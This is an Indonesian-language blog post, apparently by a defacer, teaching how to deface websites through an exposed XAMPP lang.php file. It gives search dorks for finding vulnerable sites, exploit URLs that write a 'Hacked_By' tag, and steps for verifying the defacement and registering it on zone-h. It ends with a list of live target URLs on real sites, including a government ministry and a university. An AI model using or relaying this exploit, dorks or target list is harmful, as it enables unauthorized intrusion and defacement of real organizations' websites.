Xampp Local Write Access + Live Target

Assalamualaikum Wr. Wb.

Deface Poc Xampp Local Write Access - Halo sobat kacang. Kali ini, saya akan memberikan tutorial deface yang menurut saya paling easy, Lebih easy dari kindeditor. Cuman bedanya poc ini bisa dimirorin di zone-h. Kalian tau zone-h kan? Kalo Kalian gk tau kalian bisa cari tau disini.

Banyak defacer yang ngepush zone-h dengan poc xampp local write access. Kali ini gw juga udah nyediain puluhan live target. Semuanya fresh zone-h, cuman harus nunggu redefacement saja.

Oke langsung aja.

- Dork :
inurl:/security/lang.php
inurl:/xampp/lang.php

kembangin lagi gan

- Exploit
site.com/xampp/lang.php?Hacked_By_rizki ( untuk dir xampp )
site.com/security/lang.php?Hacked_By_rizki ( untuk dir security )

Note : "Hacked_By_Rizki" bisa diubah dengan nick kalian masing - masing.

- Langkah-langkah
1. Dorking dulu dengan dork yang sudah saya sediakan diatas atau jika kalian malas dorking, kalian bisa menggunakan live target yang sudah saya sediakan dibawah.
2. Jika sudah mendapatkan sitenya, kalian beri exploit yang sudah tersedia diatas.
Contoh :
http://site.com/xampp/lang.php?hacked_by_rizki ( dir xampp )
http://site.com/security/lang.php?hacked_by_rizki ( dir security )
3. Jika berhasil akan seperti gambar dibawah ini.
Gambar :
Gambar 1 ( Xampp Local Write Access )

4. Preview :
site.com/xampp/lang.tmp ( untuk dir xampp )
site.com/security/lang.tmp ( untuk dir security )
Gambar :
Gambar 2 ( Xampp Local Write Access )

5. Jika sudah, mirorin di zone-h :D

- Live Target
http://fleischhacker-homedefi.biz/xampp/lang.php?hacked_by_rizki
http://metrologi.kemendag.go.id/xampp/lang.php?hacked_by_rizki
https://www.ftsm.ukm.my/xampp/lang.php?hacked_by_rizki
http://a-pack.co.id/xampp/lang.php?hacked_by_rizki
http://online-gen.wbpdcl.co.in/xampp/lang.php?hacked_by_rizki
https://www.bombayworli.com/xampp/lang.php?hacked_by_rizki
https://www.xingyue.com/xampp/lang.php?hacked_by_rizki
https://www.crick99.com/xampp/lang.php?hacked_by_rizki
http://www.callbiz.com/xampp/lang.php?hacked_by_rizki

Mau lebih? usaha dong xixixi

Semoga bermanfaat.
Thank's To : Banyumas Cyber Team

-Adm1n

Related Posts

1 komentar


EmoticonEmoticon